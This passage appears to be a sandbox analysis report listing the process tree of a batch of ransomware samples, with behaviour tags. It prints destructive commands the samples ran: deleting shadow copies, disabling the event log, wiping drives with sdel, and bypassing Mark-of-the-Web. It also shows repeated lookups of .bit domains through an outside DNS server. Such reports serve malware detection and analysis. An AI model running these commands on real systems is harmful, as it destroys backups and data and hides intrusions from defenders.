    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00374.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4212
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Drops startup file
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3568
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1044
      • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.MSIL.Blocker.gen-7255ad5bcb24214dab33d7dbbbff317a0fc3cb3ecaffd59e313c72bdbf5b0afc.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-7255ad5bcb24214dab33d7dbbbff317a0fc3cb3ecaffd59e313c72bdbf5b0afc.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Blocker.gen-7255ad5bcb24214dab33d7dbbbff317a0fc3cb3ecaffd59e313c72bdbf5b0afc.exe:Zone.Identifier"
          4⤵
          • Subvert Trust Controls: Mark-of-the-Web Bypass
          • System Location Discovery: System Language Discovery
          • NTFS ADS
          PID:6408
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Blocker.gen-7255ad5bcb24214dab33d7dbbbff317a0fc3cb3ecaffd59e313c72bdbf5b0afc.exe:Zone.Identifier"
          4⤵
          • Subvert Trust Controls: Mark-of-the-Web Bypass
          • System Location Discovery: System Language Discovery
          • NTFS ADS
          PID:6940
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy "HEUR-Trojan-Ransom.MSIL.Blocker.gen-7255ad5bcb24214dab33d7dbbbff317a0fc3cb3ecaffd59e313c72bdbf5b0afc.exe" "C:\Users\Admin\AppData\Roaming\msword.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • NTFS ADS
          PID:5108
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\AppData\Roaming\msword.exe"
          4⤵
            PID:3368
            • C:\Users\Admin\AppData\Roaming\msword.exe
              "C:\Users\Admin\AppData\Roaming\msword.exe"
              5⤵
                PID:12776
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\Admin\AppData\Roaming\msword.exe:Zone.Identifier"
                  6⤵
                    PID:8452
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\Admin\AppData\Roaming\msword.exe:Zone.Identifier"
                    6⤵
                      PID:10176
                    • C:\Users\Admin\AppData\Roaming\msword.exe
                      "C:\Users\Admin\AppData\Roaming\msword.exe"
                      6⤵
                        PID:4876
                • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-9f44d74b5fe2e6353074ba70ade88d1747f038ca9902be34cb2ca95eecafc760.exe
                  HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-9f44d74b5fe2e6353074ba70ade88d1747f038ca9902be34cb2ca95eecafc760.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4552
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-9f44d74b5fe2e6353074ba70ade88d1747f038ca9902be34cb2ca95eecafc760.exe:Zone.Identifier"
                    4⤵
                    • Subvert Trust Controls: Mark-of-the-Web Bypass
                    • System Location Discovery: System Language Discovery
                    • NTFS ADS
                    PID:5172
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-9f44d74b5fe2e6353074ba70ade88d1747f038ca9902be34cb2ca95eecafc760.exe:Zone.Identifier"
                    4⤵
                    • Subvert Trust Controls: Mark-of-the-Web Bypass
                    • System Location Discovery: System Language Discovery
                    • NTFS ADS
                    PID:6236
                  • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-9f44d74b5fe2e6353074ba70ade88d1747f038ca9902be34cb2ca95eecafc760.exe
                    "HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-9f44d74b5fe2e6353074ba70ade88d1747f038ca9902be34cb2ca95eecafc760.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:8340
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1336
                    4⤵
                    • Program crash
                    PID:11112
                • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.MSIL.Gen.gen-61a9ddcb15f0845bd89f2c4ca454e7d8f0a0b7a478ec2d980ae4fa333c1b4dd2.exe
                  HEUR-Trojan-Ransom.MSIL.Gen.gen-61a9ddcb15f0845bd89f2c4ca454e7d8f0a0b7a478ec2d980ae4fa333c1b4dd2.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:3020
                  • C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
                    "C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.MSIL.Gen.gen-61a9ddcb15f0845bd89f2c4ca454e7d8f0a0b7a478ec2d980ae4fa333c1b4dd2.exe
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    PID:3632
                • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Agent.gen-e8afae434aa9c3a3c848aa1f0809ebbddb6c88d45f39ba4306bbdefac4e59207.exe
                  HEUR-Trojan-Ransom.Win32.Agent.gen-e8afae434aa9c3a3c848aa1f0809ebbddb6c88d45f39ba4306bbdefac4e59207.exe
                  3⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4012
                  • C:\Windows\SYSTEM32\cmd.exe
                    "cmd.exe" /C sc config eventlog start=disabled
                    4⤵
                      PID:5344
                      • C:\Windows\system32\sc.exe
                        sc config eventlog start=disabled
                        5⤵
                        • Launches sc.exe
                        PID:2092
                    • C:\Windows\SYSTEM32\cmd.exe
                      "cmd.exe" /C REG add "HKLM\SYSTEM\CurrentControlSet\services\eventlog" / v Start / t REG_DWORD / d 4 / f
                      4⤵
                        PID:6696
                        • C:\Windows\system32\reg.exe
                          REG add "HKLM\SYSTEM\CurrentControlSet\services\eventlog" / v Start / t REG_DWORD / d 4 / f
                          5⤵
                            PID:10184
                        • C:\Windows\SYSTEM32\tasklist.exe
                          "tasklist" /V /FO CSV
                          4⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:7100
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Release.bat""
                          4⤵
                            PID:3468
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c C:\ProgramData\sdel.exe -c -z C:
                              5⤵
                                PID:9772
                                • C:\ProgramData\sdel.exe
                                  C:\ProgramData\sdel.exe -c -z C:
                                  6⤵
                                    PID:6508
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c C:\ProgramData\sdel.exe -z D:
                                  5⤵
                                    PID:6008
                                    • C:\ProgramData\sdel.exe
                                      C:\ProgramData\sdel.exe -z D:
                                      6⤵
                                        PID:7352
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c C:\ProgramData\sdel.exe -z F:
                                      5⤵
                                        PID:7968
                                        • C:\ProgramData\sdel.exe
                                          C:\ProgramData\sdel.exe -z F:
                                          6⤵
                                            PID:12252
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0tvwcnzi.3wr.bat" "
                                        4⤵
                                          PID:10444
                                          • C:\Windows\system32\PING.EXE
                                            PING 127.0.0.1 -n 1
                                            5⤵
                                            • System Network Configuration Discovery: Internet Connection Discovery
                                            • Runs ping.exe
                                            PID:9804
                                      • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Blocker.gen-3378c59eba9f93c3b7dcb589c53f63fcf7e0baba98aadbff3b994653e9dc44df.exe
                                        HEUR-Trojan-Ransom.Win32.Blocker.gen-3378c59eba9f93c3b7dcb589c53f63fcf7e0baba98aadbff3b994653e9dc44df.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: MapViewOfSection
                                        PID:3968
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                          4⤵
                                          • Accesses Microsoft Outlook profiles
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of AdjustPrivilegeToken
                                          • outlook_office_path
                                          • outlook_win_path
                                          PID:8168
                                      • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Crypmodadv.gen-ee0a206415cce60f8b3afb29d8c17f86fe1923cbdf69812be139a3012b2fa24b.exe
                                        HEUR-Trojan-Ransom.Win32.Crypmodadv.gen-ee0a206415cce60f8b3afb29d8c17f86fe1923cbdf69812be139a3012b2fa24b.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of WriteProcessMemory
                                        PID:2960
                                        • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Crypmodadv.gen-ee0a206415cce60f8b3afb29d8c17f86fe1923cbdf69812be139a3012b2fa24b.exe
                                          --84ee7c8e
                                          4⤵
                                          • Executes dropped EXE
                                          • Drops desktop.ini file(s)
                                          • System Location Discovery: System Language Discovery
                                          PID:1996
                                      • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Encoder.gen-b5608ed0190cd8126f9f7e0005b0e3331ba431594a7ccf85f0b4c2593ed73c5c.exe
                                        HEUR-Trojan-Ransom.Win32.Encoder.gen-b5608ed0190cd8126f9f7e0005b0e3331ba431594a7ccf85f0b4c2593ed73c5c.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:2132
                                        • C:\Users\Admin\AppData\Local\Temp\y_installer.exe
                                          C:\Users\Admin\AppData\Local\Temp\y_installer.exe --partner 351634 --distr /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"
                                          4⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Modifies system certificate store
                                          PID:8880
                                          • C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
                                            "C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"
                                            5⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:7860
                                          • C:\Users\Admin\AppData\Local\Temp\y_installer.exe
                                            C:\Users\Admin\AppData\Local\Temp\y_installer.exe --stat dwnldr/p=351634/cnt=0/dt=8/ct=8/rt=0 --dh 2356 --st 1730843648
                                            5⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:8584
                                      • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Generic-78d775670595e06249a026efd6d31c314707c1cdb80ef3650bffa2f7e0c57784.exe
                                        HEUR-Trojan-Ransom.Win32.Generic-78d775670595e06249a026efd6d31c314707c1cdb80ef3650bffa2f7e0c57784.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of WriteProcessMemory
                                        PID:556
                                        • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Generic-78d775670595e06249a026efd6d31c314707c1cdb80ef3650bffa2f7e0c57784.exe
                                          HEUR-Trojan-Ransom.Win32.Generic-78d775670595e06249a026efd6d31c314707c1cdb80ef3650bffa2f7e0c57784.exe
                                          4⤵
                                          • Executes dropped EXE
                                          PID:2476
                                      • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.JSWorm.gen-cedf567ebc23b6090de2703911003e3bdbf2c13cc61b700240536715935e835c.exe
                                        HEUR-Trojan-Ransom.Win32.JSWorm.gen-cedf567ebc23b6090de2703911003e3bdbf2c13cc61b700240536715935e835c.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        PID:1504
                                        • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.JSWorm.gen-cedf567ebc23b6090de2703911003e3bdbf2c13cc61b700240536715935e835c.exe
                                          HEUR-Trojan-Ransom.Win32.JSWorm.gen-cedf567ebc23b6090de2703911003e3bdbf2c13cc61b700240536715935e835c.exe
                                          4⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:5884
                                      • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-8298be3054f9f33b629b53757659873ad12b81b3f7038e0cd39fa0131f1553a3.exe
                                        HEUR-Trojan-Ransom.Win32.PolyRansom.gen-8298be3054f9f33b629b53757659873ad12b81b3f7038e0cd39fa0131f1553a3.exe
                                        3⤵
                                        • Modifies WinLogon for persistence
                                        • Drops startup file
                                        • Executes dropped EXE
                                        • Enumerates connected drives
                                        • Drops autorun.inf file
                                        • Drops file in System32 directory
                                        • System Location Discovery: System Language Discovery
                                        PID:336
                                      • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Shade.vho-115591f33f7d53985f4d8f7a519906336c386eda4fae0486904e79e925550b66.exe
                                        HEUR-Trojan-Ransom.Win32.Shade.vho-115591f33f7d53985f4d8f7a519906336c386eda4fae0486904e79e925550b66.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        • Enumerates system info in registry
                                        PID:632
                                      • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Crusis.dsu-af2c1d4af00e47af98e83cba1e368428c6d64c5048a2f2d7bd0ea836de0df7b3.exe
                                        Trojan-Ransom.Win32.Crusis.dsu-af2c1d4af00e47af98e83cba1e368428c6d64c5048a2f2d7bd0ea836de0df7b3.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        PID:872
                                        • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Crusis.dsu-af2c1d4af00e47af98e83cba1e368428c6d64c5048a2f2d7bd0ea836de0df7b3.exe
                                          C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Crusis.dsu-af2c1d4af00e47af98e83cba1e368428c6d64c5048a2f2d7bd0ea836de0df7b3.exe
                                          4⤵
                                          • Checks computer location settings
                                          • Drops startup file
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Drops desktop.ini file(s)
                                          • Drops autorun.inf file
                                          • Drops file in System32 directory
                                          • Drops file in Program Files directory
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: RenamesItself
                                          PID:1532
                                          • C:\Windows\system32\cmd.exe
                                            "C:\Windows\system32\cmd.exe"
                                            5⤵
                                              PID:2172
                                              • C:\Windows\system32\mode.com
                                                mode con cp select=1251
                                                6⤵
                                                  PID:7320
                                                • C:\Windows\system32\vssadmin.exe
                                                  vssadmin delete shadows /all /quiet
                                                  6⤵
                                                  • Interacts with shadow copies
                                                  PID:8524
                                              • C:\Windows\system32\cmd.exe
                                                "C:\Windows\system32\cmd.exe"
                                                5⤵
                                                  PID:8860
                                                  • C:\Windows\system32\mode.com
                                                    mode con cp select=1251
                                                    6⤵
                                                      PID:9424
                                                    • C:\Windows\system32\vssadmin.exe
                                                      vssadmin delete shadows /all /quiet
                                                      6⤵
                                                      • Interacts with shadow copies
                                                      PID:10148
                                                  • C:\Windows\System32\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                    5⤵
                                                      PID:8588
                                                    • C:\Windows\System32\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                      5⤵
                                                        PID:6936
                                                  • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Foreign.ojib-e8019df6572b12d099ac33d3c02e7cbd02971e55700430f5bbcd7855c4ff6ce0.exe
                                                    Trojan-Ransom.Win32.Foreign.ojib-e8019df6572b12d099ac33d3c02e7cbd02971e55700430f5bbcd7855c4ff6ce0.exe
                                                    3⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2344
                                                    • C:\Users\Admin\AppData\Roaming\openvpnserv.exe
                                                      "C:\Users\Admin\AppData\Roaming\openvpnserv.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1556
                                                  • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.GandCrypt.jes-f4f1362dd693cfe868bda49cab9be4c80a5c625df9a7f4a8e64368d925d77d46.exe
                                                    Trojan-Ransom.Win32.GandCrypt.jes-f4f1362dd693cfe868bda49cab9be4c80a5c625df9a7f4a8e64368d925d77d46.exe
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Enumerates connected drives
                                                    • System Location Discovery: System Language Discovery
                                                    • Checks processor information in registry
                                                    PID:4744
                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                      nslookup nomoreransom.bit dns1.soprodns.ru
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3020
                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                      nslookup emsisoft.bit dns1.soprodns.ru
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:8972
                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                      nslookup gandcrab.bit dns1.soprodns.ru
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:9656
                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                      nslookup nomoreransom.bit dns1.soprodns.ru
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:8560
                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                      nslookup emsisoft.bit dns1.soprodns.ru
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1908
                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                      nslookup gandcrab.bit dns1.soprodns.ru
                                                      4⤵
                                                        PID:12628
                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                        nslookup nomoreransom.bit dns1.soprodns.ru
                                                        4⤵
                                                          PID:12916
                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                          nslookup emsisoft.bit dns1.soprodns.ru
                                                          4⤵
                                                            PID:12952
                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                            nslookup gandcrab.bit dns1.soprodns.ru
                                                            4⤵
                                                              PID:1504
                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                              nslookup nomoreransom.bit dns1.soprodns.ru
                                                              4⤵
                                                                PID:5068
                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                nslookup emsisoft.bit dns1.soprodns.ru
                                                                4⤵
                                                                  PID:7616
                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                  nslookup gandcrab.bit dns1.soprodns.ru
                                                                  4⤵
                                                                    PID:9912
                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                    nslookup nomoreransom.bit dns1.soprodns.ru
                                                                    4⤵
                                                                      PID:11600
                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                      nslookup emsisoft.bit dns1.soprodns.ru
                                                                      4⤵
                                                                        PID:7144
                                                                    • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Rack.iqi-d42b70f5dafd78c0ba9ca1ede4e5d8add0a5046640cb165bf907f5bd66f246ed.exe
                                                                      Trojan-Ransom.Win32.Rack.iqi-d42b70f5dafd78c0ba9ca1ede4e5d8add0a5046640cb165bf907f5bd66f246ed.exe
                                                                      3⤵
                                                                      • Drops startup file
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Drops file in System32 directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2644
                                                                      • C:\Windows\system32\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe"
                                                                        4⤵
                                                                          PID:1676
                                                                          • C:\Windows\system32\mode.com
                                                                            mode con cp select=1251
                                                                            5⤵
                                                                              PID:512
                                                                            • C:\Windows\system32\vssadmin.exe
                                                                              vssadmin delete shadows /all /quiet
                                                                              5⤵
                                                                              • Interacts with shadow copies
                                                                              PID:1952
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 544
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:2060
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 552
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:2688
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 588
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:1232
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 596
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5332
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 480
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:4496
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 660
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:6248
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 592
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:7220
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 704
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:12160
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 712
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:6980
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 752
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:6676
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 772
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:6464
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 796
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5224
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 812
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5548
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 828
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:8368
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 772
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5312
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 808
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5328
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 812
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:6612
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 796
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:9376
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 832
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:11048
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 820
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:3980
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 708
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5520
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 772
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:8656
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 856
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:11964
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 752
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:11276
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 820
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:13180
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 852
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:7072
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 752
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:7296
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 912
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:8932
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 844
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5724
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 948
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:9768
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 980
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:11352
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 968
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:12624
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 904
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:12036
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 948
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:4608
                                                                          • C:\Windows\SysWOW64\WerFault.exe
